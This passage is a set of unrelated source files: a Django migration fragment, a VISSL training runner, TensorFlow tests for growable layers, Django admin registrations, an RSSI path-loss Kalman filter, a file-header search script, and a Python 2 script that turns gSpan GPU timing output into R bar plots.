'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']", 'null': 'True', 'blank': 'True'}),
'risk': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'})
},
u'risk.riskcategory': {
'Meta': {'ordering': "[u'name']", 'object_name': 'RiskCategory'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'stakeholder.criticalstakeholder': {
'Meta': {'ordering': "[u'id']", 'object_name': 'CriticalStakeholder'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_criticalstakeholder_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interest': ('django.db.models.fields.TextField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_criticalstakeholder_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'organisation': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"})
},
u'stakeholder.publiccontact': {
'Meta': {'object_name': 'PublicContact'},
'comment': ('django.db.models.fields.TextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_publiccontact_created'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_publiccontact_modified'", 'to': u"orm['auth.User']"}),
'prescription': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['prescription.Prescription']"}),
'stakeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['stakeholder.Stakeholder']"})
},
u'stakeholder.stakeholder': {
'Meta': {'object_name': 'Stakeholder'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '320', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_stakeholder_created'", 'to': u"orm['auth.User']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '320', 'blank': 'True'}),
'expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'modifier': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'stakeholder_stakeholder_modified'", 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'organisation': ('django.db.models.fields.CharField', [], {'max_length': '320'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '320', 'blank': 'True'})
}
}
complete_apps = ['prescription']
|
import sys
import argparse
import os
import tempfile
from os.path import join, basename, isfile, splitext, isdir
from collections import OrderedDict
import torch
from rastervision.pipeline.file_system.utils import (
sync_to_dir, make_dir, get_local_path)
from rastervision.aws_s3.s3_file_system import S3FileSystem
from vissl_experiments.utils import (
execute, run_remote_if_needed, get_file, open_zip_file)
def extract_backbone(ckpt_path, out_path):
print(f'Extracting backbone from {ckpt_path} to {out_path}...')
state_dict = torch.load(ckpt_path, map_location='cpu')
state_dict = state_dict['classy_state_dict']['base_model']['model']['trunk']
new_state_dict = OrderedDict()
remove_prefix = '_feature_blocks.'
for key, val in state_dict.items():
new_key = key[len(remove_prefix):]
new_state_dict[new_key] = val
torch.save(new_state_dict, out_path)
def run_vissl(config, dataset_dir, output_dir, extra_args, pretrained_path=None):
# Assume ImageNet format.
train_dir = join(dataset_dir, 'train')
val_dir = join(dataset_dir, 'val')
cmd = [
'python',
'/opt/vissl/vissl/tools/run_distributed_engines.py',
'hydra.verbose=true',
f'config={config}',
f'config.DATA.TRAIN.DATA_PATHS=["{train_dir}"]',
f'config.DATA.TEST.DATA_PATHS=["{val_dir}"]',
f'config.CHECKPOINT.DIR="{output_dir}"']
if pretrained_path:
cmd.append(f'config.MODEL.WEIGHTS_INIT.PARAMS_FILE="{pretrained_path}"')
cmd.extend(extra_args)
execute(cmd)
def main(args, extra_args):
make_dir(args.tmp_root)
make_dir(args.cache_dir)
with tempfile.TemporaryDirectory(dir=args.tmp_root) as tmp_dir:
output_uri = get_local_path(args.output_uri, tmp_dir)
pretrained_uri = (
get_file(args.pretrained_uri, args.cache_dir)
if args.pretrained_uri else None)
dataset_uri = open_zip_file(args.dataset_uri, args.cache_dir)
try:
run_vissl(
args.config, dataset_uri, output_uri, extra_args,
pretrained_path=pretrained_uri)
extract_backbone(
join(output_uri, 'checkpoint.torch'),
join(output_uri, 'backbone.torch'))
finally:
sync_to_dir(output_uri, args.output_uri)
def get_arg_parser():
parser = argparse.ArgumentParser(description='Run VISSL')
parser.add_argument('--config', default='')
parser.add_argument('--output-uri', default='')
parser.add_argument('--dataset-uri', default='')
parser.add_argument('--aws-batch', action='store_true')
parser.add_argument('--pretrained-uri', type=str, default=None)
parser.add_argument('--tmp-root', default='/opt/data/tmp/')
parser.add_argument('--cache-dir', default='/opt/data/data-cache/')
return parser
if __name__ == '__main__':
parser = get_arg_parser()
args, extra_args = parser.parse_known_args()
s3_file_args = ['dataset_uri', 'pretrained_uri']
run_remote_if_needed(args, extra_args, s3_file_args, 'vissl')
main(args, extra_args)
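# Example invocation (the script name, URIs and config path below are
# hypothetical; they only illustrate the flags defined in get_arg_parser):
#   python run_vissl.py \
#       --config <vissl_yaml_config_path> \
#       --dataset-uri s3://my-bucket/datasets/my-imagenet-format.zip \
#       --output-uri s3://my-bucket/vissl-output/run1 \
#       --pretrained-uri s3://my-bucket/weights/init_backbone.torch
# Any extra unrecognized arguments are forwarded to VISSL as hydra overrides
# via extra_args.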
|
# coding=utf-8
# Copyright 2022 GradMax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for growneuron.layers."""
import absl.testing.parameterized as parameterized
import growneuron.layers as glayers
import tensorflow as tf
class LayerTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.named_parameters(
('dense', tf.keras.layers.Dense(3), (3, 4)),
('batchnorm', tf.keras.layers.BatchNormalization(), (2, 4)),
('conv2d', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4))
)
def test_consistency(self, layer, input_shape):
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
original_out = layer(x)
new_out = wrapped_layer(x)
self.assertAllEqual(original_out, new_out)
@parameterized.named_parameters(
('dense', tf.keras.layers.Dense(3), (3, 4), 1),
('dense_5neuron', tf.keras.layers.Dense(3), (3, 4), 5),
('conv2d', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 1),
('conv2d_5neuron', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 5),
)
def test_add_neurons_incoming_zeros(self, layer, input_shape, n_new):
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
original_out = wrapped_layer(x)
old_output_shape = original_out.get_shape()
n_neurons_old = old_output_shape[-1]
wrapped_layer.add_neurons(n_new, new_weights='zeros', is_outgoing=False)
new_out = wrapped_layer(x)
# Check the output has the expected shape
new_shape = old_output_shape[:-1] + [n_neurons_old+n_new]
self.assertAllEqual(new_shape, new_out.get_shape())
# Check the old neurons create same output
self.assertAllClose(original_out, new_out[Ellipsis, :n_neurons_old])
# Check the new neurons create zero output
self.assertEqual(0, tf.math.count_nonzero(new_out[Ellipsis, n_neurons_old:]))
new_weights, new_biases = wrapped_layer.get_weights()
# Check the new weights are zero
added_weights = new_weights[Ellipsis, n_neurons_old:]
self.assertAllEqual(added_weights, tf.zeros_like(added_weights))
# Check the new biases are zero
added_biases = new_biases[n_neurons_old:]
self.assertAllEqual(added_biases, tf.zeros_like(added_biases))
@parameterized.named_parameters(
('dense', tf.keras.layers.Dense(3), (3, 4), 1),
('dense_5neuron', tf.keras.layers.Dense(3), (3, 4), 5),
('conv2d', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 1),
('conv2d_5neuron', tf.keras.layers.Conv2D(3, 3), (3, 5, 5, 4), 5),
)
def test_add_neurons_outgoing_zeros(self, layer, input_shape, n_new):
wrapped_layer = glayers.GrowLayer(layer)
n_features = input_shape[-1]
x = tf.random.uniform(input_shape)
# New input after growing would have more features
new_input_shape = input_shape[:-1] + (n_new,)
new_x = tf.concat([x, tf.random.uniform(new_input_shape)], axis=-1)
original_out = layer(x)
old_weights, old_biases = wrapped_layer.get_weights()
wrapped_layer.add_neurons(n_new, new_weights='zeros', is_outgoing=True)
new_out = wrapped_layer(new_x)
new_weights, new_biases = wrapped_layer.get_weights()
print(new_weights, new_biases)
# Output of the layer shouldn't change.
self.assertAllClose(original_out, new_out)
# Check biases are unchanged
self.assertAllEqual(old_biases, new_biases)
# Check the new weights are zero
added_weights = new_weights[Ellipsis, n_features:, :]
self.assertAllEqual(added_weights, tf.zeros_like(added_weights))
# Check the old weights are same
kept_weights = new_weights[Ellipsis, :n_features, :]
self.assertAllEqual(old_weights, kept_weights)
@parameterized.named_parameters(
('dense_kernel', 'dense', ('kernel',)),
('dense_bias', 'dense', ('bias',)),
('dense_activity', 'dense', ('activity',)),
('dense_all', 'dense', ('kernel', 'bias', 'activity')),
('conv2d_kernel', 'conv2d', ('kernel',)),
('conv2d_bias', 'conv2d', ('bias',)),
('conv2d_activity', 'conv2d', ('activity',)),
('conv2d_all', 'conv2d', ('kernel', 'bias', 'activity')),
)
def test_regularizer_incoming(self, layer_type, regularizer_types):
reg_kwargs = {f'{r_type}_regularizer': tf.keras.regularizers.L2(0.1)
for r_type in regularizer_types}
print(reg_kwargs)
if layer_type == 'dense':
layer = tf.keras.layers.Dense(3, **reg_kwargs)
input_shape = (3, 4)
elif layer_type == 'conv2d':
layer = tf.keras.layers.Conv2D(3, 3, **reg_kwargs)
input_shape = (3, 5, 5, 4)
else:
raise ValueError('not supported')
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
_ = wrapped_layer(x)
old_losses = wrapped_layer.losses
wrapped_layer.add_neurons(1, new_weights='zeros', is_outgoing=False)
_ = wrapped_layer(x)
new_losses = wrapped_layer.losses
for old_loss, new_loss in zip(old_losses, new_losses):
self.assertAllClose(old_loss, new_loss)
@parameterized.named_parameters(
('dense_kernel', 'dense', ('kernel',)),
('dense_bias', 'dense', ('bias',)),
('dense_activity', 'dense', ('activity',)),
('dense_all', 'dense', ('kernel', 'bias', 'activity')),
('conv2d_kernel', 'conv2d', ('kernel',)),
('conv2d_bias', 'conv2d', ('bias',)),
('conv2d_activity', 'conv2d', ('activity',)),
('conv2d_all', 'conv2d', ('kernel', 'bias', 'activity')),
('bn_beta', 'bn', ('beta',)),
)
def test_regularizer_outgoing(self, layer_type, regularizer_types):
reg_kwargs = {f'{r_type}_regularizer': tf.keras.regularizers.L2(0.1)
for r_type in regularizer_types}
print(reg_kwargs)
if layer_type == 'dense':
layer = tf.keras.layers.Dense(3, **reg_kwargs)
input_shape = (3, 4)
elif layer_type == 'conv2d':
layer = tf.keras.layers.Conv2D(3, 3, **reg_kwargs)
input_shape = (3, 5, 5, 4)
elif layer_type == 'bn':
layer = tf.keras.layers.BatchNormalization(**reg_kwargs)
input_shape = (3, 4)
else:
raise ValueError('not supported')
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
_ = wrapped_layer(x)
old_losses = wrapped_layer.losses
if layer_type == 'bn':
wrapped_layer.add_neurons_identity(1)
else:
wrapped_layer.add_neurons(1, new_weights='zeros', is_outgoing=True)
new_input_shape = input_shape[:-1] + (1,)
new_x = tf.concat([x, tf.random.uniform(new_input_shape)], axis=-1)
_ = wrapped_layer(new_x)
new_losses = wrapped_layer.losses
for old_loss, new_loss in zip(old_losses, new_losses):
self.assertAllClose(old_loss, new_loss)
@parameterized.named_parameters(
('2d_axis1', (4, 5), -1),
('3d_axis1', (3, 3, 1), -1),
('4d_axis1', (3, 3, 4, 5), -1),
('2d_axis2', (4, 5), -2),
('3d_axis2', (3, 3, 1), -2),
('4d_axis2', (3, 3, 4, 5), -2),
)
def test_norm_l2(self, shape, axis):
tensor = tf.reshape(tf.range(tf.math.reduce_prod(shape),
dtype=tf.float32), shape)
calculated_norm = glayers.norm_l2(tensor, axis)
if axis == -2:
tensor = tf.einsum('...ij->...ji', tensor)
    # Compute the expected norms with tf.norm over the flattened tensor.
flat_tensor = tf.reshape(tensor,
[-1, tensor.shape[-1]])
expected_norms = tf.norm(flat_tensor, axis=-2)
self.assertAllClose(expected_norms, calculated_norm)
@parameterized.named_parameters(
('2d_axis1', (4, 5), -1),
('3d_axis1', (3, 3, 1), -1),
('4d_axis1', (3, 3, 4, 5), -1),
('2d_axis2', (4, 5), -2),
('3d_axis2', (3, 3, 1), -2),
('4d_axis2', (3, 3, 4, 5), -2),
)
def test_normalize_l2(self, shape, axis):
tensor = tf.reshape(tf.range(tf.math.reduce_prod(shape),
dtype=tf.float32), shape)
normalized_tensor = glayers.normalize_l2(tensor, axis)
if axis == -2:
normalized_tensor = tf.einsum('...ij->...ji', normalized_tensor)
# L2 norm should be 1 over axis 1
flat_tensor = tf.reshape(normalized_tensor,
[-1, normalized_tensor.shape[-1]])
norms = tf.norm(flat_tensor, axis=-2)
self.assertAllClose(norms, tf.ones_like(norms))
if __name__ == '__main__':
tf.test.main()
|
from django.contrib.admin import ModelAdmin, register
from .models import Worker, Department, Director, OrderedWorker, EducationOffice, GeneralOffice
@register(Worker)
class WorkerAdmin(ModelAdmin):
pass
@register(Department)
class DepartmentAdmin(ModelAdmin):
pass
@register(Director)
class DirectorAdmin(ModelAdmin):
pass
@register(OrderedWorker)
class OrderedWorkerAdmin(ModelAdmin):
    pass
@register(EducationOffice)
class EducationOfficeAdmin(ModelAdmin):
    pass
@register(GeneralOffice)
class GeneralOfficeAdmin(ModelAdmin):
    pass
|
##
## Here we consider the function PL(d) = PL(d0) + 10*n*log(d/d0) -> y = theta0 + theta1*(10*log(d/d0))
## and we want to estimate the PL(d0) a constant and "n"
##
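## In the code below the unknowns are stacked as theta = [PL(d0), n], and each
## RSSI measurement y taken at distance d contributes one regression row
## H = [1, -10*log10(d/d0)], so y ~ theta0 - 10*theta1*log10(d/d0); the minus
## sign is why addMeasurement() builds t = -10*log10(d/d0).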
import numpy as np
from numpy.linalg import pinv
from numpy import dot
import math
from threading import Lock
import os
import glob
class RSSIKalmanFilterRecursive:
def __init__(self, id_, m, var, measurment_var, d0 = 1.0):
self.m = np.transpose(m)
self.P = np.array([[var, 0],[0, var]])
self.d0 = d0
self.X = np.array([[0, 0]])
self.Y = np.array([0])
self.measurment_var = measurment_var
self.gamma = self.m
self.mutex = Lock()
def addMeasurement(self, distance, measurement):
if(distance < self.d0):
return
y = measurement
t = -10.0*math.log10(distance/self.d0)
self.mutex.acquire()
self.Y = np.append(self.Y, [y], axis=0)
self.X = np.append(self.X, [[1, t]], axis=0)
self.mutex.release()
#print(self.X.shape, self.Y.shape)
def getResult(self):
self.mutex.acquire()
P = pinv(pinv(self.P) + (1.0/self.measurment_var)*dot(np.transpose(self.X[1:]), self.X[1:]))
m = dot(P,((1.0/self.measurment_var)*dot(np.transpose(self.X[1:]), self.Y[1:])+ dot(pinv(self.P),self.m)))
#self.P = P
#self.m = m
#m = dot(pinv(dot(np.transpose(self.X[1:]), self.X[1:])), dot(np.transpose(self.X[1:]), self.Y[1:]))
self.mutex.release()
return (m, P)
def getMetricValue(self, distance):
if(distance < self.d0):
return self.m[0]
m, P = self.getResult()
t = -10.0*math.log10(distance/self.d0)
#print(m)
self.gamma = m
#print('gamma', self.gamma)
return m[0] + t*m[1]
def getGamma(self):
return self.gamma[1]
class RSSIKalmanFilter:
def __init__(self, id_, m, var_L, var_alpha, measurement_var, log=False, d0 = 1.0):
self.id_ = id_
self.mu = np.transpose(np.matrix(m))
self.sigma = np.array([[var_L, 0],[0, var_alpha]])
self.d0 = d0
self.X = np.array([[0, 0]])
self.Y = np.array([0])
self.measurement_var = measurement_var
self.gamma = self.mu
self.mutex = Lock()
self.log = log
if(self.log):
home = os.path.expanduser("~")
log_dir_ = home + '/NetworkedRobotsProject/RSSLog/'
folders = glob.glob(log_dir_+'/*')
folder = log_dir_ + '/log' + str(len(folders) + 1)
os.makedirs(folder)
self.log_data = folder + '/log.txt'
self.log_data_file = open(self.log_data, 'a', 0)
print(self.log_data)
    def setMeasurmentVar(self, measurement_var):
        self.measurement_var = measurement_var
def saveLog(self, distance,measurement, measurment_var):
str_data = str(self.id_) + ',' + str(measurement) + ',' + str(distance) + ',' + str(measurment_var) + ',' + str(self.getPL()) + ',' + str(self.getGamma()) + '\n'
#print(str_data)
self.log_data_file.write(str_data)
def addMeasurement(self, distance, measurement):
if(distance < self.d0):
return
self.mutex.acquire()
z = measurement
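        # Standard Kalman measurement update for the state [PL(d0), n]:
        # H maps the state to the predicted RSSI at this distance, S is the
        # innovation covariance and K the Kalman gain.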
H = np.matrix([1, -10.0*math.log10(distance/self.d0)])
z_hat = np.dot(H,self.mu)
S = np.dot(H, np.dot(self.sigma, H.T)) + self.measurement_var
K = np.dot(self.sigma, np.dot(H.T, np.linalg.pinv(S)))
self.mu = self.mu + K*(z - z_hat)
self.sigma = np.dot((np.eye(2) - np.dot(K, H)),self.sigma)
self.mutex.release()
if(self.log):
            self.saveLog(distance, measurement, self.measurement_var)
# def addMeasurement(self, distance, measurement):
# if(distance < self.d0):
# return
# y = measurement
# t = -10.0*math.log10(distance/self.d0)
# self.mutex.acquire()
# self.Y = np.array([y])
# self.X = np.matrix([[1, t]])
# P = pinv(pinv(self.P) + (1.0/self.measurment_var)*dot(np.transpose(self.X), self.X))
# #print(P)
# self.m = dot(P,((1.0/self.measurment_var)*np.transpose(self.X)*y + dot(pinv(self.P),self.m)))
# self.P = P
# #print(self.P,self.m)
# self.mutex.release()
# if(self.log):
# self.saveLog(distance, measurement, self.measurment_var)
#print(self.X.shape, self.Y.shape)
def getResult(self):
#self.mutex.acquire()
#P = pinv(pinv(self.P) + (1.0/self.measurment_var)*dot(np.transpose(self.X[-1]), self.X[-1]))
#m = dot(P,((1.0/self.measurment_var)*dot(np.transpose(self.X[-1]), self.Y[-1])+ dot(pinv(self.P),self.m)))
#self.P = P
#self.m = m
#m = dot(pinv(dot(np.transpose(self.X[1:]), self.X[1:])), dot(np.transpose(self.X[1:]), self.Y[1:]))
#self.mutex.release()
return (self.mu, self.sigma)
def getMetricValue(self, distance):
if(distance < self.d0):
return self.mu[0][0,0]
m, P = self.getResult()
t = -10.0*math.log10(distance/self.d0)
self.gamma = m
measure = m[0] + t*m[1]
return measure[0, 0]
def getGamma(self):
return self.mu[1,0]
def getPL(self):
return self.mu[0,0]
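# Minimal usage sketch (hypothetical values: an RSSI prior of -40 dBm at
# d0 = 1 m, a path-loss exponent prior of 2.0, and a few made-up measurements).
if __name__ == '__main__':
    kf = RSSIKalmanFilter('node0', [-40.0, 2.0], var_L=25.0, var_alpha=1.0,
                          measurement_var=4.0)
    for d, rssi in [(2.0, -47.0), (4.0, -52.5), (8.0, -58.0)]:
        kf.addMeasurement(d, rssi)
    print('estimated PL(d0):', kf.getPL())
    print('estimated path-loss exponent:', kf.getGamma())
    print('predicted RSSI at 10 m:', kf.getMetricValue(10.0))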
|
__author__ = 'Robin Cole'
__version__ = '0.1.0'
"""
Created on Wed Sep 7 10:33:49 2016
Iterate through file, print out search term and next line
@author: robincole
"""
import os
my_dir = "/Users/.../IAEA phase space files"
my_list = ['TITLE',
# 'COORDINATE_SYSTEM_DESCRIPTION',
'BEAM_NAME',
'FIELD_SIZE',
'NOMINAL_SSD'] # list of search terms
for file in os.listdir(my_dir):
my_file = open(os.path.join(my_dir,file), "r")
searchlines = my_file.readlines()
print("****************")
print(file)
for i, line in enumerate(searchlines):
if any(word in line for word in my_list):
            for l in searchlines[i:i+3]:
                print(l, end='')
            print()
my_file.close()
|
#!/usr/bin/python
import sys
import os
import math
import pdb
from collections import defaultdict
if len(sys.argv) < 4:
print "usage : parse_output_gnu_plot.py <input-file> <output-dir and file prefix> <dataset name> [<support step size>] [<labels_as_K> (YI YF or N)= (F=float I=int) ] [<max support value>]"
sys.exit()
infile = sys.argv[1]
outfile = sys.argv[2]
dataset = sys.argv[3]
support_max = -1
labels_as_K = ""
if len(sys.argv) >4:
step_size = int(sys.argv[4])
if len(sys.argv) > 5:
labels_as_K = sys.argv[5].upper()
if len(sys.argv) > 6:
support_max = int(sys.argv[6])
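# Example invocation (file names and dataset label are hypothetical; the
# arguments follow the usage string above):
#   ./parse_output_gnu_plot.py gspan_timings.txt plots/citation Citation 2 YI 20000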
support_all = defaultdict(list)
seq_time_all = defaultdict(dict)
par_time_all = defaultdict(dict)
plot_colors = ["red", "blue", "green", "orange", "black"]
density = [10, 10, 10, 10, 10]
angle = [30, 90, 0, 150, 60]
marker = [16, 18, 15, 19]
f = open(infile,"r")
readFlag = False
for line in f:
line.strip()
w = line.split()
if len(w) == 0:
if readFlag == True:
readFlag = False
continue
if readFlag:
support_all[gspan_cuda_version].append(int(w[0]))
seq_time_all[gspan_cuda_version][w[0]] = float(w[1])
par_time_all[gspan_cuda_version][w[0]] = float(w[2])
if w[0] == "GSPAN" and w[1] == "CUDA" and w[2] == "version:":
gspan_cuda_version = w[3]
print gspan_cuda_version
if w[0] == "support":
readFlag = True
f.close()
def do_bar_plot_seq_vs_par(support,seq_time,par_time, outfile, filltype, ver):
support = sorted(support)
f = open(infile+"_seq_vs_par"+ver+".dat","w")
f.write("support\tseq\tpar\tspeedup\n")
for i in xrange(0,len(support),step_size):
s = support[i]
if support_max < 0 or s <= support_max:
if labels_as_K == "YF":
f.write(str(s*1.0/1000)+"K\t"+str(seq_time[str(s)])+"\t"+str(par_time[str(s)])+"\t"+str((seq_time[str(s)]*1.0)/par_time[str(s)])+"\n")
elif labels_as_K == "YI":
f.write(str(s/1000)+"K\t"+str(seq_time[str(s)])+"\t"+str(par_time[str(s)])+"\t"+str((seq_time[str(s)]*1.0)/par_time[str(s)])+"\n")
else:
f.write(str(s)+"\t"+str(seq_time[str(s)])+"\t"+str(par_time[str(s)])+"\t"+str((seq_time[str(s)]*1.0)/par_time[str(s)])+"\n")
f.close()
max_y = max( max([v for (k,v) in seq_time.items()] ), max([v for (k,v) in par_time.items()]) )
#print max_y
if max_y < 10:
ytick = math.ceil(max_y/5)
else:
ytick = math.ceil(max_y/50)*10
# Write the R script
f = open(outfile+".r","w")
f.write("#!/usr/bin/Rscript\n")
f.write("data <- read.table(\""+infile+"_seq_vs_par.dat\", header=T, sep=\"\\t\") \n")
f.write("max_y <- max(data$seq,data$par) \n")
f.write("plot_colors <- c(\"red\",\"green\")\n")
f.write("plot_density <- c(14,10)\n")
f.write("plot_angle <- c(30,90)\n")
f.write("postscript(\""+outfile+".eps\", bg=\"white\", paper=\"letter\") \n")
f.write("par(mar=c(4.2,5.2,4,4.2)+.1)\n")
if filltype == "color":
f.write("barplot(t(as.matrix(data[,2:3])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, col=plot_colors, beside=TRUE) \n")
elif filltype == "pattern":
f.write("barplot(t(as.matrix(data[,2:3])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, density=plot_density, angle=plot_angle, beside=TRUE) \n")
else:
print "wrong filltype"
sys.exit()
f.write("par(new=TRUE) \n")
if filltype == "color":
f.write("plot(data$speedup, type=\"o\", lwd=3.0, col=\"blue\", ylim=c(0,max(data$speedup)+1.8), cex=4.0, axes=FALSE, ann=FALSE)\n")
#f.write("title(main=\"Seq vs GPU graph mining\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25) \n")
f.write("axis(4, col.lab=rgb(0,0.5,0), cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, col=rgb(0,0.5,0), cex=3.25 ) \n")
f.write("legend(\"top\",c(\"Seq\", \"GPU\"), cex=3, fill=plot_colors, horiz=TRUE) \n")
elif filltype == "pattern":
f.write("plot(data$speedup, type=\"o\", lwd=3.0, ylim=c(0,max(data$speedup)+1.8), cex=4.0, axes=FALSE, ann=FALSE)\n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, cex.lab=3.25) \n")
f.write("axis(4, cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, cex=3.25 ) \n")
f.write("legend(\"top\",c(\"Seq\", \"GPU\"), cex=3, density=c(14,10), angle=c(30,90), horiz=TRUE) \n")
else:
print "wrong filltype"
sys.exit()
f.write("box() \n")
# Turn off device driver (to flush output to eps)
f.write("dev.off() \n")
f.close()
# change the permission of the R script to executable
os.chmod(outfile+".r",0755)
# run the R script and produce the eps file
os.system("./"+outfile+".r")
def do_bar_plot_seq_vs_par2(supports, seq_time, par_time, par_versions, par_labels, outfile,filltype):
support = []
for k in supports.keys():
support = supports[k] # get any of the support lists
break
support = sorted(support)
f = open(infile+"_seq_vs_par2.dat","w")
f.write("support\tseq")
for v in par_versions:
f.write("\t"+v)
for v in par_versions:
f.write("\tspeedup_"+v)
f.write("\n")
for i in xrange(0,len(support),step_size):
s = support[i]
if support_max < 0 or s <= support_max:
if labels_as_K == "YF":
f.write(str(s*1.0/1000)+"K\t"+str(seq_time[str(s)]))
elif labels_as_K == "YI":
f.write(str(s/1000)+"K\t"+str(seq_time[str(s)]))
else:
f.write(str(s)+"\t"+str(seq_time[str(s)]))
for v in par_versions:
f.write("\t"+str(par_time[v][str(s)]))
for v in par_versions:
f.write("\t"+str((seq_time[str(s)]*1.0)/par_time[v][str(s)]))
f.write("\n")
f.close()
max_y = 0
for ver in par_versions:
y = max( max([v for (k,v) in seq_time.items()] ), max([v for (k,v) in par_time[ver].items()]) )
if y > max_y:
max_y = y
#print max_y
if max_y < 10:
ytick = math.ceil(max_y/5)
else:
ytick = math.ceil(max_y/50)*10
# Write the R script
f = open(outfile+".r","w")
f.write("#!/usr/bin/Rscript\n")
f.write("data <- read.table(\""+infile+"_seq_vs_par2.dat\", header=T, sep=\"\\t\") \n")
f.write("max_y <- max(data$seq")
for v in par_versions:
f.write(",data$"+v)
f.write(") \n")
if filltype == "color":
f.write("plot_colors <- c(")
#length = 1 + len(par_versions)
for i in range(len(par_versions)):
f.write("\""+plot_colors[i]+"\",")
f.write("\""+plot_colors[len(par_versions)]+"\")\n")
elif filltype == "pattern":
f.write("plot_density <- c(")
for i in range(len(par_versions)):
f.write(""+str(density[i])+",")
f.write(""+str(density[len(par_versions)])+")\n")
f.write("plot_angle <- c(")
for i in range(len(par_versions)):
f.write(""+str(angle[i])+",")
f.write(""+str(angle[len(par_versions)])+")\n")
else:
print "wrong filltype"
sys.exit()
f.write("postscript(\""+outfile+".eps\", bg=\"white\", paper=\"letter\") \n")
f.write("par(mar=c(4.2,5.2,4,4.2)+.1)\n")
if filltype == "color":
f.write("barplot(t(as.matrix(data[,2:"+str(len(par_versions)+2)+"])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, col=plot_colors, beside=TRUE) \n")
elif filltype == "pattern":
f.write("barplot(t(as.matrix(data[,2:"+str(len(par_versions)+2)+"])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, density=plot_density, angle=plot_angle, beside=TRUE) \n")
else:
print "wrong filltype"
sys.exit()
f.write("par(new=TRUE) \n")
f.write("max_y <- max(")
for i in range(len(par_versions)-1):
f.write("data$speedup_"+par_versions[i]+",")
f.write("data$speedup_"+par_versions[len(par_versions)-1]+") \n")
if filltype == "color":
f.write("plot(data$speedup_"+par_versions[0]+", type=\"o\", lwd=3.0, col=\""+plot_colors[1] +"\", ylim=c(0,max_y+3), cex=3.5, axes=FALSE, ann=FALSE)\n")
for i in range(1,len(par_versions)):
f.write("lines(data$speedup_"+par_versions[i]+", type=\"o\", lwd=3.0, col=\""+plot_colors[i+1]+"\", cex=3.5) \n")
#f.write("lines(data$speedup"+par_versions[i]+", type=\"o\", pch=22, lty=2, lwd=3.0, col=\""+plot_colors[i]+"\", cex=3.5) \n")
